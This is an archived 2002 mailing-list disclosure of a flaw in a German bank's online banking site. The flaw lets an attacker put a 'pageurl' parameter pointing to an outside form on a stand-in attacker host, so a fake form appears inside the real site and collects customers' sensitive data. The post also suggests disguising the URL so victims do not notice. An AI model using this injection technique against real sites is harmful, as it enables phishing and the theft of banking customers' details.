Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email firstname.lastname@example.org
From: hnz geeratz[room23] (staffroom23.org)
Date: Fri Apr 05 2002 - 04:12:49 CST
I found this security issue on the german hypovereins bank.
They are informed vor 3 months ago , still there is nothing changed.
The security hole will allow a atacker to include his own forms in the
website. This will give him an option to collect sensible information.
It is a home bankin system!
take a look at this (long) URL:
now it is possible to change the
part to something like pageurl=http://www.evol.org/fake_form.php
so it is possible to include everything in this webpage.
The attacker could obscure the url in a form like:
so the user will not notice that the include form is not from the original
It opens a port to a new form of social hacking and data grabbing.
greetings hnz g
-- hnz geeratz | staffroom23.org